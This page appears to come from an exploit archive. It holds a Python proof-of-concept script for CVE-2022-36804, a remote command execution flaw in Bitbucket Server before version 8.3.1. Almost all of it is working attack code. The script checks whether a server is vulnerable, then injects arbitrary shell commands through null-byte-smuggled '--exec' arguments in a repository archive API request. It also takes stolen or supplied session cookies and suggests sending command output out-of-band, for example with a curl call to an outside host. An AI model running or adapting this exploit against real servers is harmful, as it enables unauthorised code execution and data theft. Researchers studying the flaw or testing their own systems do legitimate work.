4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import requests
import argparse
import json
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def check_if_vuln(session, url, repo, project):
    # build url
    poc_url = "{}rest/api/latest/projects/{}/repos/{}/archive?format=zip&path=bighax&prefix=test/%00test".format(url, project, repo)
    print("[+] Attempting to trigger vulnerable response via {}".format(poc_url))
    # send request
    response = session.get(poc_url, verify=False)
    # process response
    if "An error occurred while executing an external process" in response.text:
        print("[+] Server does not appear to be vulnerable. :(")
    elif "is not a valid ref and may not be archived" in response.text:
        print("[+] Server appears to be vulnerable.")
    elif "You are not permitted to access this resource" in response.text:
        print("[!] You don't have access to this resource, if this is a private repo, you can provide your session token using --session.")
    else:
        print("[+] Unknown response received from server, unable to verify if vulnerable or not.")

def run_cmd(session, url, repo, project, command):
    # URL encode payload
    enc_command = urllib.parse.quote(command)
    # build the url
    poc_url = "{}rest/api/latest/projects/{}/repos/{}/archive?format=zip&path=bighax&prefix=test/%00--remote=/%00--exec={}%00--prefix=/".format(url, project, repo, enc_command)
    print("[+] Attempting to execute command on {}".format(url))
    # process results
    response = session.get(poc_url, verify=False)
    if "An error occurred while executing an external process" in response.text:
        print("[+] Server does not appear to be vulnerable. :(")
    elif "com.atlassian.bitbucket.scm.CommandFailedException" in response.text:
        print("[+] The command has been executed, please note that command results are (mostly) blind, it is recommended to enter a command that exfils the response OOB if possible.")
        print("[+] Response received from API: {}".format(response.json()["errors"][0]["message"]))
    elif "You are not permitted to access this resource" in response.text:
        print("[!] You don't have access to this resource, if this is a private repo, you can provide your session token using --session.")


if __name__ == "__main__":
    # arg parsing
    parser = argparse.ArgumentParser(description="Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)")
    parser.add_argument("-p","--project", type=str, action="store", dest="project", help="The name of the project the public repository resides in (E.g. testproject)", required=True)
    parser.add_argument("-r","--repo", type=str, action="store", dest="repo", help="The name of the public repository (E.g. testrepo)", required=True)
    parser.add_argument("-u","--url", type=str, action="store", dest="url", help="The URL of the BitBucket server (E.g. http://localhost:7990/)", required=True)
    parser.add_argument("-c","--command", type=str, action="store", dest="command", help="The command to execute on the server (E.g. 'curl http://canary.domain/')")
    parser.add_argument("--proxy", type=str, action="store", dest="proxy", help="HTTP proxy to use for debugging (E.g. http://localhost:8080/)")
    parser.add_argument("--session", type=str, action="store", dest="session", help="The value of your 'BITBUCKETSESSIONID' cookie, required if your target repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)")
    parser.add_argument("--check", action="store_true", dest="check", help="Only perform a check to see if the instance is vulnerable")
    args = parser.parse_args()
    
    # make sure url ends with a slash
    if not args.url.endswith("/"):
        args.url += "/"

    # build requests session
    s = requests.Session()
    s.headers.update({"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"})
    if args.session:
        s.cookies.update({"BITBUCKETSESSIONID":args.session})  
    if args.proxy:
        print("[+] Configuring proxy to use {}".format(args.proxy))
        s.proxies.update({"http":args.proxy, "https":args.proxy})

    # disable warnings
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    # do the things
    if args.check:
        check_if_vuln(s, args.url, args.repo, args.project)
        exit()
    elif args.command:
        run_cmd(s, args.url, args.repo, args.project, args.command)
    else:
        print("[!] Error: Please specify either a command to execute on the server using -c or --command, or provide the --check flag to only check if the system is vulnerable.")